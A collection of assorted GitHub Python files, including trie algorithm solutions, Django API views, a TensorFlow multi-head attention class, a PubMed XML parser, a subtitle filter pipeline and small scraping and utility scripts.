+{"seq_id":"16277302511","text":"import collections\nfrom typing import List\n\n\nclass TrieNode:\n def __init__(self, word=None):\n self.word = word\n self.children = collections.defaultdict(TrieNode)\n\n\nclass Trie:\n\n def __init__(self):\n self.head = TrieNode()\n\n def insert(self, word: str) -> None:\n def insert_char(remaining_word, node):\n if not remaining_word:\n node.word = word\n return\n if remaining_word[0] not in node.children:\n node.children[remaining_word[0]] = TrieNode()\n node = node.children[remaining_word[0]]\n insert_char(remaining_word[1:], node)\n\n insert_char(word, self.head)\n\n def search(self, word: str) -> bool:\n def search_char(remaining_word, node):\n if not remaining_word:\n return node.word is not None\n if remaining_word[0] not in node.children:\n return False\n elif search_char(remaining_word[1:], node.children[remaining_word[0]]):\n return True\n return False\n\n return search_char(word, self.head)\n\n def starts_with(self, prefix: str) -> bool:\n def starts_with_char(remaining_prefix, node):\n if not remaining_prefix:\n return True\n elif remaining_prefix[0] not in node.children:\n return False\n else:\n return starts_with_char(remaining_prefix[1:], node.children[remaining_prefix[0]])\n\n return starts_with_char(prefix, self.head)\n\n\nclass WordDictionary:\n\n def __init__(self):\n self.head = TrieNode()\n\n def addWord(self, word: str) -> None:\n def add_char(word_remaining, node):\n if not word_remaining:\n node.word = word\n else:\n if word_remaining[0] not in node.children:\n node.children[word_remaining[0]] = TrieNode()\n node = node.children[word_remaining[0]]\n add_char(word_remaining[1:], node)\n\n add_char(word, self.head)\n\n def search(self, word: str) -> bool:\n def search_char(word_remaining, node):\n if not word_remaining:\n return node.word is not None\n if word_remaining[0] == '.':\n for key in node.children:\n if search_char(word_remaining[1:], node.children[key]):\n return True\n return False\n elif word_remaining[0] not in node.children:\n return False\n else:\n return search_char(word_remaining[1:], node.children[word_remaining[0]])\n\n return search_char(word, self.head)\n\n\nclass ReplaceWordTrie:\n def __init__(self):\n self.head = TrieNode()\n\n def add(self, word):\n def add_character(word_remaining, node):\n if not word_remaining:\n node.word = word\n else:\n if word_remaining[0] not in node.children:\n node.children[word_remaining[0]] = TrieNode()\n node = node.children[word_remaining[0]]\n add_character(word_remaining[1:], node)\n\n add_character(word, self.head)\n\n def starts_with(self, word):\n def starts_with_character(word_remaining, node):\n if node.word:\n return node.word\n elif word_remaining[0] not in node.children:\n return None\n else:\n return starts_with_character(word_remaining[1:], node.children[word_remaining[0]])\n\n return starts_with_character(word, self.head)\n\n\ndef replaceWords(dictionary: List[str], sentence: str) -> str:\n trie = ReplaceWordTrie()\n for word in dictionary:\n trie.add(word)\n\n result = []\n for word in sentence.split(' '):\n replacement = trie.starts_with(word)\n if replacement:\n result.append(replacement)\n else:\n result.append(word)\n return ' '.join(result)\n\n\nclass MagicDictionary:\n\n def __init__(self):\n self.head = TrieNode()\n\n def buildDict(self, dictionary: List[str]) -> None:\n def build_character(remaining, node):\n if not remaining:\n node.word = True\n else:\n if remaining[0] not in node.children:\n node.children[remaining[0]] = TrieNode()\n node = node.children[remaining[0]]\n build_character(remaining[1:], node)\n\n for word in dictionary:\n build_character(word, self.head)\n\n def search(self, searchWord: str) -> bool:\n def search_remaining(forgiven_one, remaining_word, node):\n if not remaining_word:\n return node.word is not None and not forgiven_one\n if remaining_word[0] not in node.children:\n if forgiven_one:\n for child_key in node.children:\n if search_remaining(False, remaining_word[1:], node.children[child_key]):\n return True\n return False\n else:\n return search_remaining(forgiven_one, remaining_word[1:], node.children[remaining_word[0]])\n\n return search_remaining(True, searchWord, self.head)\n\n\nclass MapSumTrieNode:\n def __init__(self, value=0):\n self.children = collections.defaultdict(TrieNode)\n self.value = value\n\n\nclass MapSum:\n\n def __init__(self):\n self.head = MapSumTrieNode()\n\n def insert(self, key: str, val: int) -> None:\n def insert_remaining(remaining_key, node):\n if not remaining_key:\n node.value = val\n else:\n if remaining_key[0] not in node.children:\n node.children[remaining_key[0]] = MapSumTrieNode()\n node = node.children[remaining_key[0]]\n insert_remaining(remaining_key[1:], node)\n\n insert_remaining(key, self.head)\n\n def sum(self, prefix: str) -> int:\n def sum_prefix(remaining_prefix, node):\n if not remaining_prefix:\n return sum_gather(node)\n elif remaining_prefix[0] not in node.children:\n return 0\n else:\n return sum_prefix(remaining_prefix[1:], node.children[remaining_prefix[0]])\n\n def sum_gather(node):\n value = node.value\n for child_key in node.children:\n value += sum_gather(node.children[child_key])\n return value\n\n return sum_prefix(prefix, self.head)\n\n\nclass BoldTagTrieNode:\n def __init__(self, word=None):\n self.word = word\n self.children = collections.defaultdict(BoldTagTrieNode)\n\n\nclass BoldTagTrie:\n def __init__(self):\n self.head = BoldTagTrieNode()\n self.pointer = self.head\n\n def insert(self, word):\n def recursive_insert(node, word_remaining):\n if not word_remaining:\n node.word = word\n elif word_remaining[0] in node.children:\n recursive_insert(node.children[word_remaining[0]], word_remaining[1:])\n else:\n temp_node = BoldTagTrieNode()\n node.children[word_remaining[0]] = temp_node\n recursive_insert(node.children[word_remaining[0]], word_remaining[1:])\n\n recursive_insert(self.head, word)\n\n def slow_search(self, letter):\n if letter in self.pointer.children:\n self.pointer = self.pointer.children[letter]\n return True\n return False\n\n def reset_pointer(self):\n self.pointer = self.head\n\n\ndef addBoldTag(s: str, words: List[str]) -> str:\n trie = BoldTagTrie()\n for word in words:\n trie.insert(word)\n\n painting = [False for _ in range(len(s))]\n\n for i in range(len(s)):\n for j in range(i, len(s)):\n if not trie.slow_search(s[j]):\n trie.reset_pointer()\n break\n if trie.pointer.word:\n painting[i:j + 1] = [True] * (j - i + 1)\n open = False\n result = ''\n\n for i, character in enumerate(s):\n if not open and painting[i] == True:\n result += ''\n open = True\n elif open and painting[i] == False:\n result += ''\n open = False\n result += character\n\n if open:\n result += ''\n\n return result\n\n\ns = \"abcxyz123\"\nwords = [\"abc\", \"123\"]\naddBoldTag(s, words)\n\n\ndef findWords(board: List[List[str]], words: List[str]) -> List[str]:\n class FindWordNode:\n def __init__(self):\n self.word = None\n self.children = collections.defaultdict(FindWordNode)\n\n class FindWordTrie:\n def __init__(self, board):\n self.board = board\n self.head = FindWordNode()\n self.directions = [[-1, 0], [1, 0], [0, 1], [0, -1]]\n\n def add_word(self, word):\n def recursive_add(node, word_remaining):\n if not word_remaining:\n node.word = word\n return\n letter = word_remaining[0]\n if letter not in node.children:\n node.children[letter] = FindWordNode()\n recursive_add(node.children[letter], word_remaining[1:])\n\n recursive_add(self.head, word)\n\n def traverse_position(self, x, y, node):\n result = []\n self.board[x][y], temp = None, self.board[x][y]\n if node.word:\n result.append(node.word)\n for x_direction, y_direction in self.directions:\n x_target, y_target = x + x_direction, y + y_direction\n if 0 <= x_target < len(self.board) and 0 <= y_target < len(self.board[0]):\n letter = self.board[x_target][y_target]\n if letter and letter in node.children:\n result.extend(self.traverse_position(x_target, y_target, node.children[letter]))\n self.board[x][y] = temp\n return result\n\n def traverse_board(self):\n result = []\n for x, row in enumerate(self.board):\n for y, value in enumerate(row):\n if value in self.head.children:\n result.extend(self.traverse_position(x, y, self.head.children[value]))\n return result\n\n trie = FindWordTrie(board)\n for word in words:\n trie.add_word(word)\n return trie.traverse_board()\n","repo_name":"daniel-zeiler/potential-happiness","sub_path":"Trie/Solutions.py","file_name":"Solutions.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"23582360588","text":"from cProfile import label\nfrom rest_framework import serializers\nfrom .models import BloodTest\n\nclass BloodTestSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BloodTest\n fields = '__all__'\n read_only_fields = ['id']\n\nclass ManyTestsSerializer(serializers.ModelSerializer):\n models = serializers.MultipleChoiceField(choices=[\n ('AdaBoostClassifier', 'Адаптивний бустинг'),\n ('DecisionTreeClassifier', 'Дерево рішень'),\n ('ExtraTreesClassifier', 'Ектра дерева'),\n ('GaussianNB', 'Гаусовий наївний байєсів класифікатор'),\n ('KNeighborsClassifier', 'К найближчих сусідів'),\n ('LogisticRegressionCV', 'Логістична регресія'),\n ('RandomForestClassifier', 'Випадковий ліс'),\n ('SVC', 'Метод опорних векторів'),\n ('VotingClassifier', 'Голосуючий класифікатор'),\n ('XGBClassifier', 'Ектримальний бустинг'),\n ])\n\n class Meta:\n model = BloodTest\n fields = '__all__'\n read_only_fields = ['id']\n\n\nclass PredictionResultSerializer(serializers.Serializer):\n model_name = serializers.CharField(label='Модель прогнозування')\n death_probability = serializers.FloatField(label='Ймовірність загинути')\n cure_probability = serializers.FloatField(label='Ймовірність одужати')","repo_name":"MaxymRomanchuk/covid-survival-checker","sub_path":"checker/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"23469321318","text":"from random import randint\nfrom time import sleep\n\ntot = 1\nnumeros = []\njogos = []\n\nprint('-'*30)\nprint(' JOGA NA MEGA SENA ')\nprint('-'*30)\n\nquant = int(input('Quantos jogos quer que eu sorteie? '))\n\nwhile tot <= quant:\n cont = 0\n while True:\n num = randint(0, 60)\n if num not in numeros:\n numeros.append(num)\n cont += 1\n if cont >= 6:\n break\n numeros.sort()\n jogos.append(numeros[:])\n numeros.clear()\n tot += 1\nprint('-=' * 3, 'SORTEANDO', '-=' * 3)\n\nfor i, n in enumerate(jogos):\n print(f'JOGO {i+1}: {n}')\n sleep(.5)\n\nprint('='*5,'BOA SORTE!', '='*5)\n","repo_name":"Brunnobeloti/Python","sub_path":"Desafios/MODULO3/ex088.py","file_name":"ex088.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"1790162252","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework import status, viewsets\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.throttling import UserRateThrottle\nfrom rest_framework.views import APIView\n\nfrom haas.serializers import UserSerializer, GroupSerializer, StatisticsSerializer\nfrom haas.hashers import DummyHasher, Md5Hasher, Sha1Hasher, Sha256Hasher\nfrom haas.models import Statistics\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\n\nclass UserRegister(APIView):\n \"\"\"\n Creates the user.\n \"\"\"\n\n def post(self, request, format='json'):\n serializer = UserSerializer(data=request.data, context={'request': request})\n if serializer.is_valid():\n user = serializer.save()\n if user:\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserLogin(APIView):\n \"\"\"\n Creates the user.\n \"\"\"\n\n def post(self, request, format='json'):\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n\n user = authenticate(username=username, password=password)\n if not user:\n return Response({\"error\": \"Login failed\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n token, _ = Token.objects.get_or_create(user=user)\n return Response({\"token\": token.key})\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass DummyHashView(APIView):\n def get(self, request, *args, **kw):\n dummy_hasher = DummyHasher()\n\n return Response({'hash': dummy_hasher.hash()})\n\n\nclass HashView(APIView):\n permission_classes = (IsAuthenticated,)\n throttle_classes = (UserRateThrottle,)\n\n def post(self, request, *args, **kw):\n data = request.data.get('data', None) # TODO: Add validation on input length\n iterations = request.data.get('iterations', None)\n algorithm = request.data.get('algorithm', None)\n\n if (data is None or iterations is None or algorithm is None):\n return Response(\n 'Bad request, POST data should be {\"data\": \"seald is awesome\", \"algorithm\": \"md5\", \"iterations\": 1}',\n status=status.HTTP_400_BAD_REQUEST\n )\n\n try:\n int(iterations)\n except:\n return Response(\n '\"iterations\" should be an integer',\n status=status.HTTP_400_BAD_REQUEST\n )\n\n if algorithm.lower() == 'md5':\n hasher = Md5Hasher(data, int(iterations))\n elif algorithm.lower() == 'sha1':\n hasher = Sha1Hasher(data, int(iterations))\n elif algorithm.lower() == 'sha256':\n hasher = Sha256Hasher(data, int(iterations))\n else:\n return Response(\n '\"algorithm\" should be md5, sha1 or sha256',\n status=status.HTTP_400_BAD_REQUEST\n )\n\n statistics = Statistics(user=request.user, algorithm=algorithm, data=data, iterations=iterations)\n statistics.save()\n\n return Response({'hash': hasher.hash()})\n\n\nclass StatisticsView(APIView):\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format='json'):\n statistics = request.user.statistics_set.all()\n serializer = StatisticsSerializer(statistics, many=True, context={'request': request})\n\n return Response(serializer.data)\n","repo_name":"achntrl/HashaaS","sub_path":"haas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"26371390253","text":"import cv2\n\n#show Images\n# img = cv2.imread(\"Resources/pikachu.png\")\n# cv2.imshow(\"Output\", img)\n# cv2.waitKey(0)\n\n#Show Video\ncap = cv2.VideoCapture(\"Resources/pikachu.mp4\")\n\nwhile True:\n success, img = cap.read()\n cv2.imshow(\"Video\", img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break","repo_name":"LindaWang7/OpenCV_Learning","sub_path":"chapter_1.py","file_name":"chapter_1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"32358595792","text":"import const, Filters, queue, sys, os, logging, AddFilters, SrtFilter\n\nclass BadIniFile(Exception):\n pass\n\nconst.SOURCE = \"source\"\nconst.SINK = \"sink\"\nconst.PIPE = \"pipe\"\nconst.FILTERS = \"filters\"\n\nconst.SEP_KEY_VALUE = \":\"\nconst.SEP_VALUE = \"^\"\nconst.SEP_ARGUMENT = \"|\"\n\ndef stripLineList( lineList ):\n resultList = []\n for line in lineList:\n resultList.append( line.strip() )\n return resultList\n\n\nclass Factory:\n def __init__(self, iniFile): #load iniFile\n \n self.__dic = {}\n self.__pipeList = []\n self.__filterList = []\n\n self.__load(iniFile)\n\n def __load(self, iniFile):\n logging.info( 'Factory __load :' + iniFile)\n file = open(iniFile)\n #make dictionary\n for line in file.readlines():\n line = line.strip()\n line = line.strip(os.linesep)\n\n if 0 == line.find('#') : # # is comment\n continue\n \n if '' != line:\n self.__innerLoad(line)\n\n\n def __innerLoad(self, line):\n\n keyValueList = line.split( const.SEP_KEY_VALUE )\n #strip\n keyValueList = stripLineList( keyValueList)\n\n if 2 != len(keyValueList) : # must conist key : value\n raise BadIniFile(\"Invalid key value IniFile (%s)\" % line )\n\n if const.FILTERS == keyValueList[0] : # filters is plural\n self.__dic[keyValueList[0] ] = keyValueList[1]\n #self.__dic[keyValueList[0] ] = keyValueList[1].split( const.SEP_VALUE )\n \n\n else:\n if 1 != len( keyValueList[1].split( const.SEP_VALUE ) ) :\n raise BadIniFile( \"Too many value IniFile (%s)\"% line)\n self.__dic[keyValueList[0] ] = keyValueList[1]\n\n def create(self, sourceFile, destFile):\n \"\"\" make queue and soruceFilter\"\"\"\n queueSrc = self.__makeClass( self.__dic[const.PIPE] )\n argList = []\n argList.append(queueSrc)\n argList.append(sourceFile)\n \n srcFilter = self.__makeClass( self.__dic[const.SOURCE], argList ) \n\n self.__pipeList.append( queueSrc)\n self.__filterList.append( srcFilter)\n \n \"\"\" make Filters \"\"\"\n sourcePipe = queueSrc\n for filterExp in self.__dic[const.FILTERS].split( const.SEP_VALUE ) :\n filterExp = filterExp.strip() # strip\n queue = self.__makeClass( self.__dic[const.PIPE] )\n \n sinkPipe = queue\n argList = []\n argList.append( sourcePipe)\n argList.append( sinkPipe)\n \n centerFilter = self.__makeClass( filterExp , argList)\n self.__pipeList.append(queue)\n self.__filterList.append(centerFilter)\n sourcePipe = queue\n\n \"\"\" make SinkFilter \"\"\"\n argList = []\n argList.append( sinkPipe)\n argList.append( destFile)\n sinkFilter = self.__makeClass( self.__dic[const.SINK], argList ) \n self.__filterList.append(sinkFilter)\n\n def __makeClass( self, expression, preArgList = None ):\n \"\"\" make preArgument \"\"\"\n expList = expression.split( const.SEP_ARGUMENT )\n\n expList = stripLineList( expList) # strip\n\n strExp = expList[0] + \"(\"\n\n \"\"\" add preArgList \"\"\"\n if None != preArgList :\n for i in range(len(preArgList) ) :\n strExp += \"preArgList[\" + str(i) + \"],\"\n\n \"\"\" add argument \"\"\"\n if 2 == len(expList):\n strExp += expList[1] + \")\"\n elif 1 == len(expList):\n strExp += \")\"\n else:\n raise BadIniFile( \"Invalid class expression (%s)\"% expression)\n\n logging.info('Factory:__makeClass ' + strExp)\n\n return eval( strExp )\n\n def run(self):\n \"\"\" start run method in thread \"\"\"\n\n for thread in self.__filterList :\n thread.start()\n\n for thread in self.__filterList :\n thread.join() # wait for thread exits\n\n\n\ndef main():\n if 3 == len(sys.argv) or 4 == len(sys.argv) :\n sourceFile = sys.argv[1]\n sinkFile = sys.argv[2]\n if 4 == len(sys.argv) :\n iniFile = sys.argv[3]\n else:\n iniFile = \"./default.ini\"\n\n # create Factory\n\n iniFile = os.path.normpath(iniFile)\n factory = Factory(iniFile)\n\n sourceFile = os.path.normpath(sourceFile)\n sinkFile = os.path.normpath(sinkFile)\n factory.create( sourceFile, sinkFile)\n\n factory.run()\n\n #finish\n else:\n print (\"usage : [sourceFile] [destFile] [iniFile]\")\n\ndef direct( sourceFile, sinkFile, iniFile = './defalut.ini' ):\n # create Factory\n factory = Factory(iniFile)\n factory.create( sourceFile, sinkFile )\n factory.run()\n\n #finish\nif __name__ == \"__main__\":\n logging.basicConfig(level =logging.INFO)\n# logging.basicConfig(filename='test.log', level=logging.DEBUG )\n main()\n \n \n \n \n \n \n \n \n\n \n \n\n \n \n \n \n \n","repo_name":"bysju/caption_modifier","sub_path":"caption_modifier.py","file_name":"caption_modifier.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"}
+{"seq_id":"33220009271","text":"import sys\nimport os\nimport tensorflow as tf\nimport numpy as np\n\n\ndef attention_bias_lower_triangle(length):\n band = tf.matrix_band_part(tf.ones([length, length]), -1, 0)\n band = tf.reshape(band, [1, 1, length, length])\n return -1e9 * (1.0 - band)\n\ndef attention_bias_by_pad_indicator(memory_padding):\n ret = memory_padding * -1e9\n return tf.expand_dims(tf.expand_dims(ret, axis=1), axis=1)\n\nclass MultiHeadAttention(object):\n def __init__(self, num_heads=1, linear_key_dim=50, linear_value_dim=50,\n hidden_size=100, dropout=1.0, attention_bias=None):\n\n assert linear_key_dim % num_heads == 0\n assert linear_value_dim % num_heads == 0\n\n self.num_heads = num_heads\n self.linear_key_dim = linear_key_dim\n self.linear_value_dim = linear_value_dim\n self.hidden_size = hidden_size\n self.dropout = dropout\n self.attention_bias = attention_bias\n\n\n def build(self, q, k, v):\n q, k, v = self._linear_projection(q, k, v)\n qs, ks, vs = self._split_heads(q, k, v)\n outputs = self._scaled_dot_product(qs, ks, vs)\n output = self._concat_heads(outputs)\n output = tf.layers.dense(output, self.hidden_size, use_bias=False)\n\n return tf.nn.dropout(output, keep_prob=self.dropout)\n\n def _linear_projection(self, q, k, v):\n q = tf.layers.dense(q, self.linear_key_dim, use_bias=False)\n k = tf.layers.dense(k, self.linear_key_dim, use_bias=False)\n v = tf.layers.dense(v, self.linear_value_dim, use_bias=False)\n return q, k, v\n\n def _split_heads(self, q, k, v):\n\n def split_last_dimension_then_transpose(tensor, num_heads, dim):\n t_shape = tensor.get_shape().as_list()\n tensor = tf.reshape(tensor, [-1] + t_shape[1: -1] + [num_heads, dim // num_heads])\n return tf.transpose(tensor, [0, 2, 1, 3]) # [batch_size, num_heads, max_seq_len, dim]\n\n qs = split_last_dimension_then_transpose(q, self.num_heads, self.linear_key_dim)\n ks = split_last_dimension_then_transpose(k, self.num_heads, self.linear_key_dim)\n vs = split_last_dimension_then_transpose(v, self.num_heads, self.linear_value_dim)\n\n return qs, ks, vs\n\n def _scaled_dot_product(self, qs, ks, vs):\n key_dim_per_head = self.linear_key_dim // self.num_heads\n o1 = tf.matmul(qs, ks, transpose_b=True) / (key_dim_per_head ** 0.5)\n o2 = o1 + self.attention_bias if self.attention_bias is not None else o1\n o3 = tf.nn.softmax(o2)\n return tf.matmul(o3, vs)\n\n\n def _concat_heads(self, outputs):\n\n def transpose_then_concat_last_two_dimension(tensor):\n tensor = tf.transpose(tensor, [0, 2, 1, 3])\n t_shape = tensor.get_shape().as_list()\n num_heads, dim = t_shape[-2:]\n return tf.reshape(tensor, [-1] + t_shape[1:-2] + [num_heads * dim])\n\n return transpose_then_concat_last_two_dimension(outputs)\n","repo_name":"timewait/cikm","sub_path":"src/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"30410234264","text":"import os\nimport xml.etree.ElementTree as ET\nimport csv\nimport sys\nimport time\nfrom lxml import etree\nfrom kg_builder.conf.config import get_sys_config\n\n# get file paths that will be used\nkg_env = os.environ.get('KG_ENV')\nxml_folder = get_sys_config('tmp_folder', kg_env)\ncsv_folder = get_sys_config('pubmed_csv_files_location', kg_env)\narticle_node_folder = csv_folder + '/articles'\narticle_mesh_folder = csv_folder + '/mesh'\narticle_ct_folder = csv_folder + '/ct'\n\n\ndef PubmedArticleParser(elem):\n\n PubMed = {\"pmid\": \"\",\n \"url\": \"\",\n \"title\" : \"\",\n \"journal\": \"\",\n \"pub_date_year\": \"\",\n \"pub_date_month\": \"\",\n \"pub_date_day\": \"\"}\n\n searchTermList = ('patient','Patient','volunteer', 'Volunteer', 'clinical trial', 'Clinical Trial', 'Clinical Trial')\n eligible = 0\n PubMedCTList = []\n PubMedMeshList = []\n # check if it's a valid pubmed article by looking for PMID\n PMID = elem.findtext('MedlineCitation/PMID')\n if PMID != None:\n PubMed['pmid'] = PMID\n # now we check to see if this article is worth including.\n # we include it if one of the search terms are found in the abstract - indicating that the paper references human subjects\n pubYear = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Year')\n if (pubYear != None):\n if (int(pubYear) >= 1990):\n PubMed[\"pub_date_year\"] = pubYear\n abstract = elem.findtext('MedlineCitation/Article/Abstract/AbstractText')\n if abstract != None:\n if any(term in abstract for term in searchTermList):\n eligible = 1\n # we also include it if we can find an NCT number in the secondary IDs (with a subheader of clinicaltrials.gov)\n if elem.find('MedlineCitation/Article/DataBankList/DataBank/DataBankName') != None:\n if elem.find('MedlineCitation/Article/DataBankList/DataBank/DataBankName').text == \"ClinicalTrials.gov\":\n accessionNumberList = elem.findall(\n 'MedlineCitation/Article/DataBankList/DataBank/AccessionNumberList/AccessionNumber')\n for number in accessionNumberList:\n PubMedCT = {\"pmid\": PMID,\n \"nct_id\": number.text\n }\n PubMedCTList.append(PubMedCT)\n eligible = 1\n\n # if the trial is eligible, we parse out the rest of the fields.\n if eligible == 1:\n ChemicalList= elem.findall('MedlineCitation/ChemicalList/Chemical/NameOfSubstance')\n for chemical in ChemicalList:\n PubMedMesh = {\"pmid\": PMID,\n \"mesh_term\" : chemical.text,\n \"type\" : \"chemList\"\n }\n PubMedMeshList.append(PubMedMesh)\n\n SupplMeshList= elem.findall('MedlineCitation/SupplMeshList/SupplMeshName')\n for suppMesh in SupplMeshList:\n PubMedMesh = {\"pmid\": PMID,\n \"mesh_term\" : suppMesh.text,\n \"type\" : \"suppList\"\n }\n PubMedMeshList.append(PubMedMesh)\n\n MeshList= elem.findall('MedlineCitation/MeshHeadingList/MeshHeading')\n for mesh in MeshList:\n PubMedMesh = {\"pmid\": PMID,\n \"mesh_term\" : mesh.findtext('./DescriptorName'),\n \"type\" : \"meshList\"\n }\n PubMedMeshList.append(PubMedMesh)\n\n PubMed[\"url\"] = \"https://www.ncbi.nlm.nih.gov/pubmed/\" + PubMed['pmid']\n pubYear = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Year')\n if pubYear != None:\n PubMed[\"pub_date_year\"] = pubYear\n pubMonth = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Month')\n if pubMonth != None:\n PubMed[\"pub_date_month\"] = pubMonth\n pubDay = elem.findtext('MedlineCitation/Article/Journal/JournalIssue/PubDate/Day')\n if pubDay != None:\n PubMed[\"pub_date_day\"] = pubDay\n journal = elem.findtext('MedlineCitation/Article/Journal/Title')\n if journal != None:\n PubMed[\"journal\"] = journal\n title = elem.findtext('MedlineCitation/Article/ArticleTitle')\n if title != None :\n PubMed[\"title\"] = title\n return PubMed, PubMedCTList, PubMedMeshList\n else:\n return None, None, None\n else :\n return None, None, None\n\n\ndef xml_to_csv_pubmed_parser(filename):\n\n input_filename = filename +\".xml\"\n output_filename = filename\n\n xml_filename = os.path.join(xml_folder, input_filename)\n article_node_filename = os.path.join(article_node_folder, (output_filename + \"_article.csv\"))\n article_mesh_filename = os.path.join(article_mesh_folder, (output_filename + \"_mesh.csv\"))\n article_ct_filename = os.path.join(article_ct_folder, (output_filename+ \"_ct.csv\"))\n\n article_node_fields = [\"pmid\",\"url\",\"title\",\"journal\",\"pub_date_year\",\"pub_date_month\",\"pub_date_day\"]\n article_mesh_fields = [\"pmid\", \"mesh_term\", \"type\"]\n article_ct_fields = [\"pmid\", \"nct_id\"]\n\n\n if not os.path.exists(xml_folder):\n os.makedirs(xml_folder)\n if not os.path.exists(article_node_folder):\n os.makedirs(article_node_folder)\n if not os.path.exists(article_mesh_folder):\n os.makedirs(article_mesh_folder)\n if not os.path.exists(article_ct_folder):\n os.makedirs(article_ct_folder)\n\n with open (article_node_filename, 'w',encoding=\"utf-8\") as article_node_file, open (article_mesh_filename , 'w',encoding=\"utf-8\") as article_mesh_file, open (article_ct_filename , 'w',encoding=\"utf-8\") as article_ct_file :\n writer1 = csv.DictWriter(article_node_file, fieldnames=article_node_fields , quoting=csv.QUOTE_NONNUMERIC )\n writer1.writeheader()\n writer2 = csv.DictWriter(article_ct_file, fieldnames=article_ct_fields , quoting=csv.QUOTE_NONNUMERIC)\n writer2.writeheader()\n writer3 = csv.DictWriter(article_mesh_file, fieldnames=article_mesh_fields , quoting=csv.QUOTE_NONNUMERIC)\n writer3.writeheader()\n\n filename_without_extension, extension = os.path.splitext(input_filename)\n if extension == '.xml':\n with open(xml_filename, 'r',encoding=\"utf-8\") as f:\n print(\"Processing : \" + input_filename)\n start = time.time()\n context = etree.iterparse(xml_filename, tag='PubmedArticle', encoding = 'utf-8')\n for event, elem in context:\n Pubmed, PubmedCT, PubmedMesh = PubmedArticleParser(elem)\n\n if (Pubmed!= None):\n writer1.writerow(Pubmed)\n\n if (PubmedCT != None):\n for CT in PubmedCT:\n writer2.writerow(CT)\n\n if (PubmedMesh != None):\n for mesh in PubmedMesh:\n writer3.writerow(mesh)\n\n elem.clear()\n if elem.getprevious() is not None:\n del elem.getparent()[0]\n end = time.time()\n print(end-start)\n \n","repo_name":"e599/trialsearch","sub_path":"kg_builder/pubmed/xml_to_csv_pubmed_parse.py","file_name":"xml_to_csv_pubmed_parse.py","file_ext":"py","file_size_in_byte":7566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"38717096738","text":"import os\n\n\ndef get_env_var(variable: str) -> str:\n value = os.environ.get(variable)\n if value:\n # Remove the quotation marks if they exist\n if value.startswith('\"') and value.endswith('\"'):\n value = value[1:-1]\n return value\n\n return value\n\n print(\"Environment variable not set.\")\n","repo_name":"Lightblash/telegram-bot-expense-tracker","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"36216324791","text":"from itertools import groupby\nfrom pprint import pprint\nimport requests\n\nurl = 'http://universities.hipolabs.com/search'\n\nheaders = {\"Accept\": 'application/json'}\n\nr = requests.get(url=url,headers=headers)\n\nuniversities = list(r.json())\n\ncountries = list( map( lambda x: x['country'], universities) )\n\ncountries.sort()\ncountries = dict( \n map( lambda t: (t[0], len(list(t[1]))), groupby(countries))\n )\npprint(countries)","repo_name":"vbmchik/py2064","sub_path":"day17/day17_2.py","file_name":"day17_2.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"22631744252","text":"from pprint import pprint\n\ntry:\n import sys\n import os\n\n sys.path.append(\n os.path.abspath(\n os.path.join(\n os.path.dirname(__file__), '..'\n )\n )\n )\n\nexcept Exception as error:\n print(error)\nimport time\nimport logging as log\nlog.basicConfig(\n filename='logs.log', level=log.DEBUG, filemode='w', format='%(levelname)s - %(name)s - %(funcName)s - %(message)s'\n)\nfrom requester.factory import Requesters\nfrom parser.factory import Parsers\nfrom animesonline_online.site import AnimesonlineOnline\nfrom database.databases import SQLite\n\nfirst_page = 'https://animesonlinecc.to/anime/'\n\nreq = Requesters.use_requests()\nparser = Parsers.use_bs4()\n\nsite = AnimesonlineOnline(parser, req)\ndb = SQLite()\nsite_anime_db = site.get_series_db(db)\n\ndata = []\nfor page in range(2, 80):\n time.sleep(.2)\n content = req.get_content(f'https://ww31.animesonline.online/animes/page/{page}/', type='text')\n animes = parser.select_all(content, 'div.animation-2 article.item div.data h3 a')\n titles = [a.text for a in animes]\n links = [a.get('href') for a in animes]\n data += [{'anime': a, 'link': l} for a, l in zip(titles, links)]\n# 